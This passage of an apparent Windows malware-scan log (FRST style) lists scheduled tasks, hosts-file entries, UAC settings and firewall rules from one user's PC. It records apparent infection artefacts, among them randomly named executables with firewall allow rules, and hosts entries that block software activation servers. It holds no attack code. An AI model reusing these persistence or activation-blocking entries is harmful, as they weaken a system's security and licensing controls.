Task: {C10402EE-5A05-4161-AD27-A2192D3562CC} - System32\Tasks\{DA905C87-7E94-C064-9156-0FA60FF7E39B} => C:\Program Files (x86)\Common Files\aOTSAwA.exe [2009-07-13] (Microsoft Corporation)
Task: {CF4B4749-FF70-43AC-8383-6FB9944D036B} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-10-09] (Adobe Systems Incorporated)
Task: {D1788CFB-4E95-475D-A654-A756FB32447C} - System32\Tasks\MSIAfterburner => C:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe [2016-10-24] ()
Task: {EED0FE4D-F72B-4D5D-BC8A-496A53AB62E6} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2017-04-12] (TODO: <Company name>)
Task: {EF7D4116-8D62-4F57-9298-34E940612BE7} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe
Task: {F4E00397-2025-4A47-B1A6-8FE93D4F1AED} - \SUPERAntiSpyware Scheduled Task 6a4df63f-045a-4646-b0f7-05167fe1a6a5 -> No File <==== ATTENTION
Task: {F83672FA-1D00-47DE-8FCA-C526017F8331} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => Command(1): %windir%\system32\GWX\GWXUXWorker.exe -> /ScheduleUpgradeReminderTime
Task: {F83672FA-1D00-47DE-8FCA-C526017F8331} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => Command(2): C:\Windows\system32\GWX\GWXDetector.exe [2015-12-08] (Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\AdwCleaner_onReboot.job => C:\Users\Dango\Desktop\adwcleaner 3.5.1.2522_7.1.1.exe
Task: C:\Windows\Tasks\update-S-1-5-21-4162917515-3570797744-2880415204-1000.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Task: C:\Windows\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


Shortcut: C:\Users\Dango\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\Online Help.lnk -> hxxp://www.virtualdj.com/wiki
Shortcut: C:\Users\Dango\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\www.virtualdj.com.lnk -> hxxp://www.virtualdj.com

==================== Loaded Modules (Whitelisted) ==============

2018-04-08 09:56 - 2018-03-23 20:13 - 000544192 _____ () C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem\DisplayDriverAnalyzer\_DisplayDriverCrashAnalyzer64.dll
2016-03-03 19:37 - 2005-03-12 01:07 - 000087040 _____ () C:\Windows\System32\pdfcmnnt.dll
2016-09-11 19:28 - 2014-10-24 14:16 - 000721263 _____ () C:\Windows\SysWOW64\WSCM64.dll
2017-08-28 19:43 - 2017-08-28 19:43 - 000230064 _____ () C:\Program Files (x86)\Notepad++\NppShell_06.dll
2016-03-03 16:31 - 2016-03-03 16:31 - 000417944 _____ () C:\Program Files\Nitro\Pro 10\Nitro_UpdateService.exe
2016-03-03 16:30 - 2016-03-03 16:30 - 002546840 _____ () C:\Program Files\Nitro\Pro 10\Nitro_KissMetrics.dll
2015-06-25 07:53 - 2015-06-25 07:53 - 000699704 _____ () C:\Program Files (x86)\TuneUp Utilities 2014\avgrepliba.dll
2016-02-27 16:04 - 2008-02-13 16:54 - 000167936 _____ () C:\Program Files\802.11 Wireless LAN\802.11n Wireless USB Adapter HW.17\WlanWpsSvc.exe
2018-10-17 12:41 - 2018-09-12 11:35 - 002701064 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Windows:nlsPreferences [386]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mbamchameleon => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mbamchameleon => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\...\localhost -> localhost

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2016-03-24 00:17 - 2018-10-04 21:57 - 000001959 _____ C:\Windows\system32\Drivers\etc\hosts

127.0.0.1                   tonec.com
127.0.0.1                   www.tonec.com
127.0.0.1                   internetdownloadmanager.com
127.0.0.1                   star.tonec.com
127.0.0.1                   rev.dyxnet.com
127.0.0.1                   65.52.240.48
127.0.0.1                   activation.cloud.techsmith.com
127.0.0.1  telemetry.malwarebytes.com
127.0.0.1  skipittok.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Dango\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

MSCONFIG\startupreg: CCleaner Smart Cleaning => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: CloneCDTray => "C:\Program Files (x86)\SlySoft\CloneCD\CloneCDTray.exe" /s                                                                                                                                                                                                              
MSCONFIG\startupreg: Gaijin.Net Agent => "C:\Users\Dango\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe"                                                                                                                                                                                           
MSCONFIG\startupreg: IDMan => C:\Program Files (x86)\Internet Download Manager\IDMan.exe /onboot                                                                                                                                                                                                       
MSCONFIG\startupreg: Sidebar => C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\steam.exe" -silent                                                                                                                                                                                                                         
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"                                                                                                                                                                                                       
MSCONFIG\startupreg: Xvid => C:\Program Files (x86)\Xvid\CheckUpdate.exe

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{6B5BDABC-7773-41B9-8955-AE765FE08BAA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{057477AD-1087-41BF-97E2-D3220B3AE2D5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{E3574BC3-4820-4126-8D7E-2939BB474E41}] => (Allow) C:\Users\Dango\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{DF8159C6-FF0B-413F-A3CF-778E033AF30E}] => (Allow) C:\Users\Dango\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{9CBF0E81-0345-4F66-9978-23875DA3EDD8}] => (Allow) C:\Users\Dango\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{4F142A3B-CD06-4E42-9D44-C580D350B1AD}] => (Allow) C:\Users\Dango\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{FCFE12FA-8EDC-46B1-BAD2-11ABA1A4F923}] => (Allow) C:\Users\Dango\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{1C765C25-9812-4400-AACE-0210DB141A33}] => (Allow) C:\Users\Dango\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{6536DB78-A1AD-4D81-B2E7-1A33995E0CF1}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\swScheduler\DTSCoordinatorService.exe
FirewallRules: [{81D58450-3795-456F-BCA1-878991FA05F5}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\swScheduler\DTSCoordinatorService.exe
FirewallRules: [{86710BAF-8D93-4007-9499-CD5E340F0AC6}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360.exe
FirewallRules: [{BC2ED155-2F50-42EB-AA8B-4C782688B4B8}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360.exe
FirewallRules: [{DDEA1ED2-7F3B-4B99-9B93-BE968E2A540E}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360_cl.exe
FirewallRules: [{C4321D9E-CB58-4A51-97E8-0B75DA8E6E33}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360_cl.exe
FirewallRules: [TCP Query User{512E5352-F02E-43EA-A745-D9296B5E2017}C:\program files\solidworks corp\solidworks\photoview\photoview360.exe] => (Allow) C:\program files\solidworks corp\solidworks\photoview\photoview360.exe
FirewallRules: [UDP Query User{D5C6A217-47C6-4A23-A073-D899744E82A2}C:\program files\solidworks corp\solidworks\photoview\photoview360.exe] => (Allow) C:\program files\solidworks corp\solidworks\photoview\photoview360.exe
FirewallRules: [{E58293CE-4C95-425A-8206-E2D08D6038E5}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{7A4B8CB6-C2EE-4091-A811-4EE881D483B6}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{16C774C8-2FEC-46C2-B0EE-7CEEE0AB7A88}] => (Allow) LPort=80
FirewallRules: [{67DBC6C8-09B2-436A-BCD7-751C4FDC90D3}] => (Allow) LPort=80
FirewallRules: [{777DD158-E959-400A-9C03-BBDEA6D153CB}] => (Allow) LPort=443
FirewallRules: [{0E83844E-DDC9-4B49-B676-4D2DE8391603}] => (Allow) LPort=443
FirewallRules: [{DFADA6A4-5B2C-4778-A022-44EB30537218}] => (Allow) LPort=20010
FirewallRules: [{C26B4224-C9E7-4A4F-9ECB-AD365B01745B}] => (Allow) LPort=20010
FirewallRules: [{6D7BDF79-E20E-46B2-9A24-1995A37E7A62}] => (Allow) LPort=3478
FirewallRules: [{C8EEC7A2-4CE1-427A-A7AD-7EEC8F45F7BC}] => (Allow) LPort=3478
FirewallRules: [{09B03742-8CC4-4AF2-8F31-52F6012A4C4A}] => (Allow) LPort=7850
FirewallRules: [{3A15AC9C-3B29-42BD-A342-91282BC3A169}] => (Allow) LPort=7850
FirewallRules: [{CB058C27-BDFD-405A-8361-EDF82716233E}] => (Allow) LPort=7852
FirewallRules: [{B4EFF182-F014-4CF4-84CE-A2CCD5F4F008}] => (Allow) LPort=7852
FirewallRules: [{183282B4-67AC-4F69-80A1-1AC2F2322D17}] => (Allow) LPort=7853
FirewallRules: [{861D5C0B-9114-4FB6-8311-C0871AC1CF49}] => (Allow) LPort=7853
FirewallRules: [{2254D696-E7AF-4AEC-B48C-B65419B82E9E}] => (Allow) LPort=27022
FirewallRules: [{DB7EEC9E-C651-40E5-A8F5-552BD7560E9A}] => (Allow) LPort=27022
FirewallRules: [{52D071BF-4F44-4856-910F-6712B128E4B5}] => (Allow) LPort=6881
FirewallRules: [{F9241EE8-E834-42A8-95DD-82708DD77E43}] => (Allow) LPort=6881
FirewallRules: [{446D0CE6-6A79-42F2-A9E6-FA5E8670E191}] => (Allow) LPort=33333
FirewallRules: [{7879B904-EFD7-4E68-834F-4419771CFB40}] => (Allow) LPort=33333
FirewallRules: [{015E8849-524F-4325-80F1-6BF73821F53F}] => (Allow) LPort=20443
FirewallRules: [{D4E2670E-1462-482A-B919-7A8322D14E52}] => (Allow) LPort=20443
FirewallRules: [{89099B0C-78D5-4565-9B63-618C234F7062}] => (Allow) LPort=8090
FirewallRules: [{3A58218F-4E87-4F73-8513-D0B136ACB96E}] => (Allow) LPort=8090
FirewallRules: [{7CF3C7C4-D432-4CE5-AA10-C50C5D3943B4}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{4AC68811-DED5-4E27-B6AC-A543785FA681}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{FDE1341A-5D3A-4C2D-B898-947E36C55C08}C:\program files (x86)\voobly\voobly.exe] => (Allow) C:\program files (x86)\voobly\voobly.exe
FirewallRules: [UDP Query User{9469BBA3-F31E-4838-BAF0-ADEFD34C6720}C:\program files (x86)\voobly\voobly.exe] => (Allow) C:\program files (x86)\voobly\voobly.exe
FirewallRules: [TCP Query User{E62CADB6-0129-4089-B22F-C2FA9E8F0C65}F:\age\age2_x1\age2_x1.exe] => (Allow) F:\age\age2_x1\age2_x1.exe
FirewallRules: [UDP Query User{8F97F842-AD14-45AF-B078-DF2CFE2E4285}F:\age\age2_x1\age2_x1.exe] => (Allow) F:\age\age2_x1\age2_x1.exe
FirewallRules: [TCP Query User{964DFBC0-7EDD-431F-925E-718E6FC4FEFA}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [UDP Query User{AA609A74-A701-4F43-A575-7AF60D05018B}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [TCP Query User{E3F78A8B-DD76-42F8-B046-36033F7FB591}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{892561C0-9787-40CC-B91E-32436AE1986B}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{4109CAE3-3233-496A-B1A2-686AC06F8734}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [TCP Query User{51B58BFD-9C9F-4989-AC17-B2664FCCE38E}C:\program files (x86)\java\jre1.8.0_144\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_144\bin\javaw.exe
FirewallRules: [UDP Query User{FDBCD199-D39F-46F2-84AD-A6D183C2C0B0}C:\program files (x86)\java\jre1.8.0_144\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_144\bin\javaw.exe
FirewallRules: [TCP Query User{53D139E5-5742-46EF-9DDD-739E7DF6D98B}C:\program files (x86)\voobly\voobly.exe] => (Allow) C:\program files (x86)\voobly\voobly.exe
FirewallRules: [UDP Query User{220F6B69-BA95-46A3-B972-C82A71F16ADA}C:\program files (x86)\voobly\voobly.exe] => (Allow) C:\program files (x86)\voobly\voobly.exe
FirewallRules: [{B465BAAA-D211-4CCA-BE0F-513DABB70662}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{E66638F6-2ED2-48F0-9F93-C81C0645B6F5}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [TCP Query User{C3181DCA-1C11-40BB-8AB9-6D4149A21A5A}F:\age\age2_x1\age2_x1.exe] => (Block) F:\age\age2_x1\age2_x1.exe
FirewallRules: [UDP Query User{81A60C2E-5E50-4695-ACE2-E22920D1631B}F:\age\age2_x1\age2_x1.exe] => (Block) F:\age\age2_x1\age2_x1.exe
FirewallRules: [TCP Query User{0E057881-BEE2-4380-A20E-DEFF3A3B880B}C:\windows\syswow64\dplaysvr.exe] => (Block) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [UDP Query User{47BA6D90-55D1-4FC9-8EB4-F6990BC777DA}C:\windows\syswow64\dplaysvr.exe] => (Block) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [{F215D715-9BF1-4BED-928E-20603D9B2FF8}] => (Allow) C:\Windows\SysWOW64\msiexec.exe
FirewallRules: [{BFB6590B-4A72-4B16-AFA7-0601C2EDCBE0}] => (Allow) C:\Users\Dango\noiSziUSYyUv.exe
FirewallRules: [{C369719A-B2AC-4D42-8D02-5D29026AF255}] => (Allow) C:\Program Files (x86)\Common Files\aOTSAwA.exe
FirewallRules: [{BCE9F6BF-7349-4D72-B279-66B1A32985F7}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{5F44FF4A-3C95-43AD-B910-040A4774D433}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E205F5F5-51C4-4B48-8F09-6865722C24CB}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A11B09AB-67F3-41E6-B4EC-331635C1268A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{DD140554-D26D-4AB6-A584-4016B0FCF935}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9E3FD079-59CC-41B5-B777-74D095B3F5F5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{71727AAF-9251-4DBD-B36A-0609CE94CC1D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{2D85C5DA-689E-45AE-ADD0-4D09C0942CFC}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{DCED2390-85D6-4798-8C70-35F2E00CA6B0}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9665FB02-0AFA-49FB-A5B5-4305A79F1338}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E9E15AA3-7494-41C8-8EDC-FFA54F2F5E92}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6C62CF9F-65EA-422B-B3C7-797CE14D675F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{AEBC6069-A1E2-43C6-8CA7-3FAE8C0D0EFD}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{8549A6B5-187D-4F55-8CB9-5B9936E80879}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A77BEDE5-9F38-4FA0-8BAF-685C04CA2A0A}] => (Allow) C:\Windows\SysWOW64\tracert.exe
FirewallRules: [{53FBB0C6-FD6C-4FAB-A605-C9456F1DC171}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{008BB5AF-9F01-43BE-99C4-BED45FF129FF}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{4EB0AC3E-E142-46B6-9410-A852752D9FB5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{829C3500-1255-4F3B-8F0B-1591A42164AE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{848DA305-0B26-42EE-8A39-9DA00A1FEC28}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{DEB3A7AA-BDEC-42F2-B735-887B64DC05B6}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{609FD134-4C36-45F7-A8CE-56ECFED1DE51}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F9BA60C5-781E-43D0-95CF-637A85DAAB70}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6D6A8CAC-DE06-4546-BDF4-6A02EB499A3C}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{2F2D0B36-794E-4B1E-A972-8E1DA174E477}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{BC36EE44-EFC6-445B-8438-80251ED212AB}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B0D21F03-74B7-45F0-A8C6-C6989B8813F0}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6F923F4A-4D93-412B-8C6C-332499826AF3}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{C08F3C2E-FC47-4CB6-9ABE-15DF54D15AE9}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{8E7A3687-4733-4E54-8AD7-E5DF02947F8E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F4E8A0AC-5C52-4085-B79B-46CF650372E5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{EABE8547-A91B-4E60-894A-6B724B3E634E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{5AAE694F-7B43-4D73-AB03-A9122C773A58}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{EACD7A1C-42DC-465B-9854-CB2D47E719EF}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7EAB48B2-659E-4E2B-862D-A14878477487}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{808A4A42-E7E1-4164-96ED-53400E63A139}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B0F2F0B1-5F4C-4AE9-87B6-3C86D94FFDFE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{70DEF6E0-A906-4F8F-BADE-2815DD2BD161}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{CD0657F3-9F4D-4F31-854D-E699F7450A60}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{EF88155A-FAA9-4D86-AEC7-5C2E4F6F2500}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{046CA470-A711-41BD-9B9F-8113F60098C6}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{FECD8BB5-ABAF-4505-BB98-989C43DE7DFE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D4817376-82AD-4FB8-8A99-45DA684F24C9}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A25603F5-6ACB-4CE9-B848-13498939B19A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B5EE2C09-6EAD-42BF-9A2C-DD5BC5FA1079}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{EA76BBC4-73A1-41D8-8D1B-3BE76558A1D0}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{961F4666-BBC6-4F74-A286-1F8E94ED0BA9}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{CE88F8B5-578B-4DE6-AEF3-6ECEB9AB68A6}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D145C107-C87E-4E5A-9716-2D05349D5A03}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{0D0605D3-954F-400B-8D67-A4B1C4AE4571}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{0144592C-3B9E-47AD-9F01-F9083174A813}] => (Allow) C:\Windows\SysWOW64\tracert.exe
FirewallRules: [{E733EF00-964B-4995-893A-F40A64DAAC76}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{AD84DFC5-B7AF-42B4-945A-9D0F5C527329}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{08DC8028-3959-46FA-9FB5-606954EBE49B}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{FB6E91C8-858C-44DD-BEAC-98D341C4822F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9DBCBC82-8AE1-4F0F-83F2-6A2D90B61104}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6E2C6F41-7962-43E5-AAB4-3E0DFFF0B3F8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F7CD2F0F-B5CC-408F-AC96-495A5C5C5615}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F0067BCD-08CA-4FFC-8B27-B8A0CDCBEE46}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9B54FA52-4CCF-4C80-8ACF-5B482BF750E2}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6022ECD4-03D2-4425-BE07-48561FB4E064}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{68E080CA-CD79-43DE-BC1C-51537CAA2C71}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{07316328-BD37-4DFE-9F4D-4432DA9A8735}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{874206FF-85E4-4200-9B16-3560FFD7899A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{79552677-E4C0-4FA6-B61F-E9000FC8C9B7}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{69D64612-A90A-4032-BE10-84E8238D1353}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{2AB52514-77EE-4593-B161-858DBD13F027}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9EB3D17E-786E-4498-ABE4-8EA4768BBB54}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{11A2B9AC-3795-4075-81B5-2C6662E94A33}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{C2EF7E9E-AC0D-4585-8F09-A7DFF3C74F0A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E098A1F5-AE05-4D73-B4D9-06B387F535D2}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{C778A4D3-221F-448D-9F91-DB1719A5A977}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6A90BD93-19DE-4B7E-ACFF-687914454524}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{03D52784-E9D9-4B65-82AE-F158D04D5B3E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E6295E25-0AF6-45D6-9494-B8F967F3383B}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{5C8574B2-6040-429E-BBD5-EFE57EC725A1}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F8BCC31A-2ACF-4A11-8ABA-B0C1ADA8B368}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{1436451A-FB9C-485F-9B9B-24BB7999E439}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{03673883-40C1-45C8-9D48-247F453E89F9}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9124C530-A387-4DBB-981A-FF8881AA5819}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{58898548-2E90-44E6-9C9E-931E0142C021}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{31343B51-7CFD-447F-B144-630AEEFE9EAE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{50B25592-1250-4EF5-BD4A-F662257D46ED}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F05EF5B4-E3AB-4739-A66E-758CDE586872}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{FDC1E486-D16B-4076-971F-9F08E8EBC774}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{DADEFB8B-23E3-493E-825C-5692C16CC3CE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{AA1BC92C-C0FB-40D8-B822-4FC91BF1FD20}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{0A4C8C0A-1696-4C60-953B-686CAEE76839}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{0527F2D4-9594-44E1-BF4F-05480A59805E}] => (Allow) C:\Windows\SysWOW64\tracert.exe
FirewallRules: [{5142CB32-6F9F-40AA-BF38-BAA9149B3669}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F077F2C4-DABA-481E-B3F7-E1DBFBC61F4E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{C30F005D-49D3-4E7E-A7B1-6E621CB3D445}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7772790B-3F7E-49C0-AED0-B654C409072D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{2926F4E4-2936-4C51-9AC4-6BC99ACE3761}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{82D67BC1-7C98-42DE-99F2-A9440564259D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{49D40A51-1B47-467D-B7C7-096156B8686C}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{0A46B3FB-D4A7-4DCB-A262-76C8CD5EB974}] => (Allow) C:\Windows\SysWOW64\tracert.exe
FirewallRules: [{985635AC-F3D4-4FE4-A010-6AB7843AE8E8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{CE0A46A8-E9C2-4559-8D5A-B1E3CD2939FE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B9822B33-7DCF-4033-9087-C07522BFB4C3}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{C2CFD8F6-6B5D-4273-BD67-F04C0AB79A3F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{83238319-CEE4-4A75-9ED3-8B7CA152F046}] => (Allow) C:\Windows\SysWOW64\svchost.exe
